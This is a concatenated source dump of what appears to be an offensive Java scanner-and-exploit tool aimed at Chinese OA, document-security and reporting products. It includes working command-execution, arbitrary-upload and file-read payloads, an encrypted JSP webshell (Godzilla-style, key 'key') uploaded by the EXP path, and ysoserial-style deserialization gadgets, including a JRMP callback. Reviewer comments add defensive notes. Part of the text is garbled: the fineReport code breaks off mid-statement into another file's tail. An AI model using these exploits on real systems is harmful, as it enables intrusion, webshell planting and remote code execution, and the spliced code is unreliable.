}else { 33 | WriteLog("\n 不存在漏洞"); 34 | } 35 | } 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/XinDianController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | import java.net.MalformedURLException; 10 | 11 | @BasicMapping(uri = "新点OA") 12 | public class XinDianController extends Controller implements BasicController{ 13 | @VulnerabilityDescriptionMapping(Description = "人员列表.xls 信息泄露",SupportVulType = SupportVul.信息泄露) 14 | public void vul_ExcelExport(Poc_Exp type, String target, Object... 
args) throws MalformedURLException { /* 新点 (Epoint) OA personnel-list export exposure check. POC only - EXP is a no-op. GETs /ExcelExport/人员列表.xls and reports the host as vulnerable on any HTTP 200. NOTE(review): a bare status check is the weakest possible verdict - SPAs, catch-all routes and "friendly" error pages answer 200 for every path, so this produces false positives; at minimum check the Content-Type, or the first bytes of the body for a spreadsheet rather than HTML. NOTE(review): the path segment is raw non-ASCII; whether it is percent-encoded before it hits the wire depends on HttpRequest, which is not visible here - confirm. */ 15 | 16 | WriteLog("\n[*]开始检测: vul_ExcelExport"); 17 | 18 | switch (type){ 19 | case EXP: 20 | break; 21 | case POC: 22 | HttpRequest httpRequest = new HttpRequest(target+"/ExcelExport/人员列表.xls"); 23 | String data = ""; 24 | Response result = httpRequest.Get(data); 25 | /* Status code only - see the false-positive note above. */ if(result.statusCode==200){ 26 | WriteLog("\n[*] 存在漏洞"); 27 | WriteLog("\n[*] 访问地址:"+target+"/ExcelExport/人员列表.xls" ); 28 | }else { 29 | WriteLog("\n[*] 不存在漏洞"); 30 | } 31 | //WriteLog("\n"+result.responseBody); 32 | } 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/YiSaitongController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | import java.io.ByteArrayInputStream; 10 | import java.net.MalformedURLException; 11 | import org.w3c.dom.Document; 12 | import org.w3c.dom.Element; 13 | import org.w3c.dom.Node; 14 | import org.w3c.dom.NodeList; 15 | 16 | import javax.xml.parsers.DocumentBuilder; 17 | import javax.xml.parsers.DocumentBuilderFactory; 18 | 19 | 20 | @BasicMapping(uri = "亿赛通") 21 | public class YiSaitongController extends Controller implements BasicController{ 22 | @VulnerabilityDescriptionMapping(Description = "亿赛通电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传漏洞",SupportVulType = SupportVul.UploadFile) 23 | public void vul_UploadFile(Poc_Exp type, String target, Object... 
args) throws MalformedURLException { /* 亿赛通 (Esafenet) CDG UploadFileFromClientServiceForClient upload check. POC only - the EXP case is empty. The query string after "?" is an opaque encoded blob copied from the published request; what it encodes (presumably the destination path / filename) is not visible from this file. NOTE(review): the verdict is "HTTP 200 on a POST of the body 'Test'" with no inspection of the response or of any resulting file, so every endpoint that answers 200 is reported vulnerable. NOTE(review): the "vulnerable link" is built as target+"tttT.jsp" with no "/" separator, unlike every other link in this file (target+"/..."); the printed URL is almost certainly malformed and the expected filename cannot be confirmed from here. NOTE(review): if the endpoint is vulnerable this POC presumably writes a file on the target - it is not side-effect-free. */ 24 | WriteLog("\n[*] 开始检测: 亿赛通电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传漏洞"); 25 | String url = "/CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM"; 26 | switch (type){ 27 | case POC: 28 | HttpRequest httpRequest = new HttpRequest(target+url); 29 | Response result = httpRequest.Post("Test"); 30 | /* Status code only - see the false-positive note above. */ if (result.statusCode == 200){ 31 | WriteLog("\n[*] 存在漏洞"); 32 | WriteLog("\n[*] 漏洞链接:"+target+"tttT.jsp"); 33 | }else { 34 | WriteLog("\n[*] 不存在漏洞"); 35 | } 36 | /* No break: POC falls into the empty EXP case, which is harmless here. */ case EXP: 37 | } 38 | } 39 | 40 | /** 亿赛通 (Esafenet) CDG bundled-Solr DataImportHandler command execution. The command is read from the UI text field (exCommandText) and spliced into the dataConfig URL parameter assigned on the following line; the XML the target sends back is then parsed to pull the output out. NOTE(review): that XML is produced by the target, i.e. by the party being attacked - the parser used for it must have DTD and external-entity processing disabled, or a hostile target can turn the scan around on the operator. */ @VulnerabilityDescriptionMapping(Description = "亿赛通电子文档安全管理系统 dataimport 命令执行漏洞",SupportVulType = SupportVul.RuntimeExec) 41 | public void vul_dataimport(Poc_Exp type, String target, Object... args) throws MalformedURLException { 42 | WriteLog("\n[*] 开始检测: 亿赛通电子文档安全管理系统 dataimport 命令执行漏洞"); 43 | String command = Cache.uiController.exCommandText.getText(); 44 | String url = 
"/solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22"+command+"%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20"; 45 | String requestData = " \n \n "; 46 | 47 | switch (type){ 48 | case POC: 49 | HttpRequest httpRequest = new HttpRequest(target+url); 50 | httpRequest.addHeaders("Accept","*/*"); 51 | httpRequest.addHeaders("Content-Type", "application/xml"); 52 | httpRequest.addHeaders("Content-Length","40"); 53 | Response result = httpRequest.Post(requestData); 54 | 55 | if (result.statusCode == 200 && result.responseBody.contains("xml version=\"1.0")){ 56 | try { 57 | DocumentBuilder builder = 
DocumentBuilderFactory.newInstance().newDocumentBuilder(); /* NOTE(review): default JAXP settings - DTDs, external general/parameter entities and entity expansion are all left enabled, and the document parsed here is the target's own response. A hostile or already-compromised target can therefore answer with an XXE / billion-laughs payload that is processed on the operator's machine (file read via the error path, SSRF from the scanner host, or a denial of service). Harden the factory before newDocumentBuilder(): setFeature("http://apache.org/xml/features/disallow-doctype-decl", true), setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true), setXIncludeAware(false), setExpandEntityReferences(false). */ 58 | ByteArrayInputStream input = new ByteArrayInputStream(result.responseBody.getBytes("UTF-8")); 59 | Document document = builder.parse(input); 60 | /* Extract the command output. The code expects the DIH response to carry it as <arr name="title"><str>...</str></arr>: walk every <arr>, keep the one named "title" and take its first <str>. */ 61 | NodeList nodeList = document.getElementsByTagName("arr"); 62 | 63 | for (int i = 0; i < nodeList.getLength(); i++) { 64 | Element element = (Element) nodeList.item(i); 65 | if ("title".equals(element.getAttribute("name"))) { 66 | /* item(0) is null when the <arr> has no <str> child; the NPE is swallowed by the catch below. */ Node strNode = element.getElementsByTagName("str").item(0); 67 | String content = strNode.getTextContent().trim(); 68 | WriteLog("\n 命令:"+content); 69 | WriteExpLog("[*] "+content); 70 | } 71 | } 72 | } catch (Exception e) { 73 | /* NOTE(review): a parse failure only goes to stderr; the method still reports 存在漏洞 below, because the verdict is the 200 + "<?xml" test above, not successful extraction of output. */ e.printStackTrace(); 74 | } 75 | WriteLog("\n[*] 存在漏洞"); 76 | 77 | WriteLog("\n[*] 切换到命令执行模块执行其他命令"); 78 | 79 | }else { 80 | WriteLog("\n[*] 不存在漏洞"); 81 | } 82 | /* No break: POC falls into the empty EXP case, which is harmless here. */ case EXP: 83 | } 84 | } 85 | 86 | } 87 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/YimiController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | @BasicMapping(uri = "一米OA") 10 | public class YimiController extends Controller implements BasicController{ 11 | 12 | @VulnerabilityDescriptionMapping(Description="一米OA getfile.jsp 任意文件读取漏洞" ,SupportVulType= SupportVul.信息泄露) 13 | public void vul_Getfile(Poc_Exp type, String target, Object... 
args) throws Exception { 14 | WriteLog("\n[*]开始检测: 一米OA getfile.jsp 任意文件读取漏洞"); 15 | 16 | switch (type){ 17 | case EXP: 18 | break; 19 | case POC: 20 | HttpRequest httpRequest = new HttpRequest(target+"/public/getfile.jsp?user=1&prop=activex&filename=../public/getfile&extname=jsp"); 21 | Response result = httpRequest.Get(""); 22 | if(result.responseBody.contains("import")&&result.statusCode==200){ 23 | WriteLog("\n[*] 存在漏洞"); 24 | WriteLog(result.responseBody); 25 | }else { 26 | WriteLog("\n[*] 不存在漏洞"); 27 | } 28 | WriteLog("\n[*]"+result.responseBody); 29 | } 30 | } 31 | 32 | } 33 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/ehrController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.HttpRequest; 6 | import com.achuna33.Utils.Response; 7 | import com.achuna33.Utils.Utils; 8 | @BasicMapping(uri = "红海EHR") 9 | public class ehrController extends Controller implements BasicController{ 10 | @VulnerabilityDescriptionMapping(Description="红海EHR任意文件上传漏洞" ,SupportVulType= SupportVul.UploadFile) 11 | public void vul_ehr_CVM(Poc_Exp type, String target, Object... 
args) throws Exception { 12 | WriteLog("\n[*]开始检测: 红海EHR任意文件上传漏洞"); 13 | String data = "------WebKitFormBoundaryQb1l0Fqa\r\n" + 14 | "Content-Disposition: form-data; name=\"OPTION\"\r\n" + 15 | "\r\n" + 16 | "{\"OPTION\":\"SAVEFILE\"}\r\n" + 17 | "------WebKitFormBoundaryQb1l0Fqa\r\n" + 18 | "Content-Disposition: form-data; name=\"FILENAME\"\r\n" + 19 | "\r\n" + 20 | "{\"FILENAME\":\"versions.txt\"}\r\n" + 21 | "------WebKitFormBoundaryQb1l0Fqa\r\n" + 22 | "Content-Disposition: form-data; name=\"file\";filename=\"versions.txt\"\r\n" + 23 | "\r\n" + 24 | "shellcode\r\n" + 25 | "------WebKitFormBoundaryQb1l0Fqa"; 26 | String url2 = "/cas/js/lib/buttons/iconfig.jsp"; 27 | String url = "/RedseaPlatform/OfficeServer"; 28 | switch (type){ 29 | case EXP: 30 | String path = null; 31 | String mypayload = null; 32 | try { 33 | path = (String) args[0]; 34 | try { 35 | byte[] bytes = Utils.readFile(path); 36 | mypayload = new String(bytes); 37 | }catch (Exception e){ 38 | WriteExpLog("\n [*] 文件读取失败"); 39 | } 40 | }catch (Exception e){ 41 | 42 | } 43 | String payload = "<%! 
String xc=\"3c6e0b8a9c15224a\"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance(\"AES\");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),\"AES\"));return c.doFinal(s); }catch (Exception e){return null; }}\n" + 44 | "%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader(\"Content-Length\"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))"; 46 | 47 | if (mypayload!=null){ 48 | payload = mypayload; 49 | }else { 50 | WriteExpLog("\n [*] 默认shell 为哥斯拉shell 密码 key"); 51 | } 52 | String expshellpath = Utils.getRandomString(4)+".jsp"; 53 | // url = url.replace("iconfig.jsp",expshellpath); 54 | HttpRequest httpRequest3 = new HttpRequest(target+url); 55 | httpRequest3.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.31"); 56 | httpRequest3.addHeaders("X-Requested-With","XMLHttpRequest"); 57 | httpRequest3.addHeaders("Accept-Encoding"," gzip, deflate"); 58 | httpRequest3.addHeaders("Content-type","multipart/form-data; boundary=----WebKitFormBoundaryQb1l0Fqa"); 59 | httpRequest3.addHeaders("Accept-Language"," zh-CN,zh;q=0.9"); 60 | httpRequest3.addHeaders("Accept"," application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequest"); 61 | data = data.replace("shellcode",payload).replace("versions.txt",expshellpath); 62 | 63 | httpRequest3.Post(data); 64 | 65 | Response result1 = new HttpRequest(target +"/uploadfile/"+expshellpath).Get(""); 66 | if(result1.statusCode==200){ 67 | WriteExpLog("\n[*] shell path:\n"+target +"/uploadfile/"+expshellpath); 68 | }else { 69 | WriteExpLog("\n 访问失败:\n"+target +"/uploadfile/"+expshellpath); 70 | WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性"); 71 | 72 | } 73 | break; 74 | 
case POC: 75 | String shellpath = Utils.getRandomString(4)+".txt"; 76 | String poc = "103ccba74d78db6awfererterter3c"; 77 | HttpRequest httpRequest2 = new HttpRequest(target+url); 78 | httpRequest2.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.31"); 79 | httpRequest2.addHeaders("X-Requested-With","XMLHttpRequest"); 80 | httpRequest2.addHeaders("Accept-Encoding"," gzip, deflate"); 81 | httpRequest2.addHeaders("Content-type","multipart/form-data; boundary=----WebKitFormBoundaryQb1l0Fqa"); 82 | httpRequest2.addHeaders("Accept-Language"," zh-CN,zh;q=0.9"); 83 | httpRequest2.addHeaders("Accept"," application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequest"); 84 | httpRequest2.Post(data.replace("shellcode",poc).replace("versions.txt",shellpath)); 85 | Response result = new HttpRequest(target+"/uploadfile/"+shellpath).Get(""); 86 | if(result.responseBody.contains("103ccba74d78db6awfererterter3c")&&result.statusCode==200){ 87 | WriteLog("\n[*] 存在漏洞"); 88 | // WriteLog("访问:"+target +url2.replace("iconfig.jsp",shellpath)); 89 | }else { 90 | WriteLog("\n[-] 不存在漏洞"); 91 | } 92 | } 93 | } 94 | } 95 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/fineReportController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | import java.net.MalformedURLException; 10 | 11 | @BasicMapping(uri = "帆软OA") 12 | public class fineReportController extends Controller implements BasicController{ 13 | 14 | @VulnerabilityDescriptionMapping(Description = "帆软报表 V9 design_save_svg 任意文件覆盖文件上传",SupportVulType = 
SupportVul.UploadFile)
    /**
     * POSTs a small JSP fragment to the design_save_svg endpoint with a traversing {@code filePath} that
     * resolves to {@code /WebReport/update.jsp}, then fetches a page and looks for "Hello World".
     * NOTE(review): this "POC" is destructive — it overwrites {@code update.jsp} on the target.
     * The two branches differ only in the read-back URL: EXP GETs the save endpoint ({@code target+url})
     * while POC GETs {@code /update.jsp}; the EXP read-back looks like a copy/paste slip.
     * Defender notes: normalise {@code filePath} server-side and reject anything escaping the svg directory;
     * a POST to {@code cmd=design_save_svg} whose {@code filePath} contains {@code ../} is the detection pattern.
     *
     * @param type   POC or EXP (both write the file)
     * @param target base URL of the host under test
     * @param args   unused
     * @throws MalformedURLException from the HTTP helper
     */
    public void vul_design_save_svg(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测: 帆软报表 V9 design_save_svg 任意文件覆盖文件上传");
        String url = "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp";
        String data = "{\"__CONTENT__\":\"<%out.println(\\\"Hello World!\\\");%>\",\"__CHARSET__\":\"UTF-8\"}";
        switch (type){
            case EXP:
                new HttpRequest(target+url).Post(data);   // write; the POST response is not inspected

                HttpRequest httpRequest2_exp = new HttpRequest(target+url);   // NOTE(review): reads back the save endpoint, not /update.jsp as POC does
                Response result2_exp = httpRequest2_exp.Get("");
                if(result2_exp.responseBody.contains("Hello World") && result2_exp.statusCode==200){
                    WriteExpLog("\n[*] 存在漏洞");
                }else {
                    WriteExpLog("\n[*] 不存在漏洞");
                }
                WriteExpLog("\n"+result2_exp.responseBody);
                break;
            case POC:
                new HttpRequest(target+url).Post(data);   // same destructive write as EXP

                HttpRequest httpRequest2 = new HttpRequest(target+"/update.jsp");
                Response result2 = httpRequest2.Get("");
                if(result2.responseBody.contains("Hello World") && result2.statusCode==200){
                    WriteLog("\n[*] 存在漏洞");
                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
                WriteLog("\n[*]"+result2.responseBody);
        }
    }
    /**
     * POC: reads {@code privilege.xml} through get_geo_json's {@code resourcepath} and treats a 200 containing
     * "rootManagerName" as confirmation, then tries to cut a password field out of the body. EXP is a no-op.
     * NOTE(review): the listing is corrupted from the first {@code split("")} onward — text between angle
     * brackets was stripped during extraction (presumably the XML element names used as split delimiters),
     * lines 59–92 of the file are absent, and after {@code split("} on line 104 the text jumps into the tail of
     * what is presumably CommonsBeanutils1.getObject (the next file in listing order; its header and
     * {@code main} are not visible). Do not read the garbled region as source.
     *
     * @param type   POC or EXP
     * @param target base URL of the host under test
     * @param args   unused
     * @throws MalformedURLException from the HTTP helper
     */
    @VulnerabilityDescriptionMapping(Description = "帆软报表 V8 get_geo_json 任意文件读取漏洞 CNVD-2018-04757",SupportVulType = SupportVul.信息泄露)
    public void vul_get_geo_json(Poc_Exp type, String target, Object... args) throws MalformedURLException{
        WriteLog("\n开始检测: 帆软报表 V8 get_geo_json 任意文件读取漏洞 CNVD-2018-04757");
        String url = "/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml";
        switch (type){
            case EXP:

                break;
            case POC:
                Response result2 = new HttpRequest(target+url).Get("");
                if(result2.responseBody.contains("rootManagerName") && result2.statusCode==200){
                    WriteLog("\n[*] 存在漏洞");
                    // --- garbled region begins (see method comment) ---
                    String passwordEncode = result2.responseBody.split("")[1].split("")[0];
                    passwordEncode = passwordEncode.split("\n" +
                            "\n" +
                            "\n" +
                            "\n" +
                            "\n" +
                            "\n" +
                            "\n" +
                            "\n" +
                            "\n" +
                            "\n" +
                            "";
                    String passwordEncode = data.split("")[1].split("")[0];
                    passwordEncode = passwordEncode.split(" queue = new PriorityQueue(2, (Comparator) comparator);
        // --- from here on the text is the tail of (presumably) CommonsBeanutils1.getObject ---
        // stub data for replacement later
        queue.add(new BigInteger("1"));
        queue.add(new BigInteger("1"));

        // switch method called by comparator
        Reflections.setFieldValue(comparator, "property", "outputProperties");

        // switch contents of queue
        // the queue's backing array is overwritten directly so the comparator is not invoked at build time
        final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
        queueArray[0] = templates;
        queueArray[1] = templates;
        return queue;
    }
    /**
     * Serialises the object built by {@code getObject} into a byte array.
     *
     * @param type  payload type forwarded to {@code getObject}
     * @param param payload parameters forwarded to {@code getObject}
     * @return the Java-serialised gadget
     * @throws Exception propagated from {@code getObject} / the serialisation
     */
    public static byte[] getBytes(PayloadType type, String...
param) throws Exception {
        Object queue = getObject(type,param);


        // serialise
        ByteArrayOutputStream baous = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baous);
        oos.writeObject(queue);
        byte[] bytes = baous.toByteArray();
        oos.close();   // not in a finally; harmless for an in-memory stream
        return bytes;
    }
}
-------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/CommonsBeanutils2.java: --------------------------------------------------------------------------------
package com.achuna33.Gadgets;


import com.achuna33.Gadgets.utils.Gadgets;
import com.achuna33.Gadgets.utils.Reflections;
import com.achuna33.SupportType.PayloadType;
import com.achuna33.Utils.MyURLClassLoader;

import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.math.BigInteger;
import java.util.Comparator;
import java.util.PriorityQueue;

/**
 * Builds the CommonsBeanutils2 deserialisation gadget: a {@link PriorityQueue} whose comparator is a
 * {@code BeanComparator} pointed at the {@code outputProperties} property, with a TemplatesImpl in both
 * queue slots, so that the comparator's property lookup reaches the TemplatesImpl when the queue is
 * deserialised (the classic ysoserial CommonsBeanutils chain). {@code BeanComparator} is loaded from a
 * bundled {@code commons-beanutils-1.8.2.jar} through {@code MyURLClassLoader} — presumably to serialise
 * with that library version's stream identity rather than the one on the tool's classpath (not verifiable here).
 * Defender notes: native Java deserialisation of untrusted bytes is the root cause; an
 * {@code ObjectInputFilter} that rejects {@code PriorityQueue}/{@code BeanComparator}/{@code TemplatesImpl}
 * where they are not expected, or avoiding native serialisation entirely, is the fix.
 * {@code main} writes the payload to {@code 333.ser} in the working directory.
 */
public class CommonsBeanutils2 {
    /** Writes a command-type payload ("calc") to {@code 333.ser}; the stream is not closed if {@code write} throws. */
    public static void main(String[] args) throws Exception {
        byte[] bytes = getBytes(PayloadType.command, "calc");
        FileOutputStream fous = new FileOutputStream("333.ser");
        fous.write(bytes);
        fous.close();
    }
    /**
     * Builds the gadget object graph.
     *
     * @param type  payload type forwarded to {@code Gadgets.createTemplatesImpl}
     * @param param payload parameters forwarded to {@code Gadgets.createTemplatesImpl}
     * @return the armed {@link PriorityQueue}
     * @throws Exception propagated from class loading, reflection and the templates builder
     */
    public static Object getObject(PayloadType type, String...
param) throws Exception{
        Object tpl = Gadgets.createTemplatesImpl(type, param);

        // transformer starts out pointing at the harmless toString; it is re-pointed at newTransformer below
        InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
        HashMap innerMap = new HashMap();
        Map m = LazyMap.decorate(innerMap, transformer);

        Map outerMap = new HashMap();
        TiedMapEntry tied = new TiedMapEntry(m, tpl);
        outerMap.put(tied, "t");   // put() hashes the TiedMapEntry, which performs a lazy lookup on m right now
        // clear the inner map data, this is important
        // (presumably so the lazy lookup misses again at deserialisation time — TODO confirm)
        innerMap.clear();

        Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
        return outerMap;
    }
    /**
     * Serialises the object built by {@code getObject} into a byte array.
     *
     * @param type  payload type forwarded to {@code getObject}
     * @param param payload parameters forwarded to {@code getObject}
     * @return the Java-serialised gadget
     * @throws Exception propagated from {@code getObject} / the serialisation
     */
    public static byte[] getBytes(PayloadType type, String... param) throws Exception {
        Object outerMap = getObject(type,param);
        // serialise
        ByteArrayOutputStream baous = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baous);
        oos.writeObject(outerMap);
        byte[] bytes = baous.toByteArray();
        oos.close();

        return bytes;
    }
}
-------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/CommonsCollectionsK2.java: --------------------------------------------------------------------------------
package com.achuna33.Gadgets;

import com.achuna33.Gadgets.utils.Gadgets;
import com.achuna33.Gadgets.utils.Reflections;
import com.achuna33.SupportType.PayloadType;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.keyvalue.TiedMapEntry;
import org.apache.commons.collections4.map.LazyMap;
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

/**
 * commons-collections4 twin of CommonsCollectionsK1: a {@link HashMap} keyed by a {@code TiedMapEntry}
 * over a {@code LazyMap} whose factory is an {@code InvokerTransformer} re-pointed at {@code newTransformer},
 * with a TemplatesImpl as the tied key. Differs from K1 only in the package (collections4) and the
 * {@code LazyMap.lazyMap} factory instead of {@code LazyMap.decorate}.
 * Defender notes: an {@code ObjectInputFilter} rejecting the commons-collections functor classes, or the
 * library's own serialisation switch for unsafe functors, closes this chain; {@code main} writes the payload
 * to {@code 4444.ser} in the working directory.
 */
public class CommonsCollectionsK2 {
    /** Writes a command-type payload ("calc") to {@code 4444.ser}; the stream is not closed if {@code write} throws. */
    public static void main(String[] args) throws Exception {
        byte[] bytes = getBytes(PayloadType.command, "calc");
        FileOutputStream fous = new FileOutputStream("4444.ser");
        fous.write(bytes);
        fous.close();
    }
    /**
     * Builds the gadget object graph (see class comment).
     *
     * @param type  payload type forwarded to {@code Gadgets.createTemplatesImpl}
     * @param param payload parameters forwarded to {@code Gadgets.createTemplatesImpl}
     * @return the armed outer {@link Map}
     * @throws Exception propagated from reflection and the templates builder
     */
    public static Object getObject(PayloadType type, String... param) throws Exception{
        Object tpl = Gadgets.createTemplatesImpl(type, param);
        InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

        HashMap innerMap = new HashMap();
        Map m = LazyMap.lazyMap(innerMap, transformer);

        Map outerMap = new HashMap();
        TiedMapEntry tied = new TiedMapEntry(m, tpl);
        outerMap.put(tied, "t");   // put() hashes the TiedMapEntry, which performs a lazy lookup on m right now
        // clear the inner map data, this is important
        // (presumably so the lazy lookup misses again at deserialisation time — TODO confirm)
        innerMap.clear();

        Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
        return outerMap;
    }
    /**
     * Serialises the object built by {@code getObject} into a byte array.
     *
     * @param type  payload type forwarded to {@code getObject}
     * @param param payload parameters forwarded to {@code getObject}
     * @return the Java-serialised gadget
     * @throws Exception propagated from {@code getObject} / the serialisation
     */
    public static byte[] getBytes(PayloadType type, String... param) throws Exception {
        Object outerMap = getObject(type,param);

        // serialise
        ByteArrayOutputStream baous = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baous);
        oos.writeObject(outerMap);
        byte[] bytes = baous.toByteArray();
        oos.close();

        return bytes;
    }
}
-------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/JRMPClient.java: --------------------------------------------------------------------------------
package com.achuna33.Gadgets;


import java.lang.reflect.Proxy;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.util.Random;

import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;



/**
 * Builds a {@link Registry} dynamic proxy whose {@code RemoteObjectInvocationHandler} wraps a
 * {@code UnicastRef} pointing at the host:port given in {@code command}; a JVM that deserialises it
 * re-establishes that remote reference, i.e. makes an outbound JRMP connection to that endpoint.
 * Defender notes: an outbound JRMP/RMI connection from a deserialising service to an unexpected host is the
 * detection signal; {@code ObjectInputFilter} (JEP 290) and keeping RMI/DGC off untrusted networks are the
 * mitigations. Uses {@code sun.rmi.*} internals, so it is tied to specific JDK builds. {@code main} is empty.
 */
public class JRMPClient {

    /**
     * @param command {@code host} or {@code host:port}; without a port a random value from
     *                {@code Random.nextInt(65535)} (0..65534, so 0 is possible) is used
     * @return the armed {@link Registry} proxy
     * @throws Exception propagated; a non-numeric port also raises {@link NumberFormatException} from {@code Integer.valueOf}
     */
    public Registry getObject ( final String command ) throws Exception {

        String host;
        int port;
        int sep = command.indexOf(':');
        if ( sep < 0 ) {
            port = new Random().nextInt(65535);

host = command;
        }
        else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }
        ObjID id = new ObjID(new Random().nextInt()); // RMI registry
        TCPEndpoint te = new TCPEndpoint(host, port);
        UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
        RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
        Registry proxy = (Registry) Proxy.newProxyInstance(JRMPClient.class.getClassLoader(), new Class[] {
            Registry.class
        }, obj);
        return proxy;
    }


    /** Intentionally empty entry point. */
    public static void main ( final String[] args ) throws Exception {

    }
}
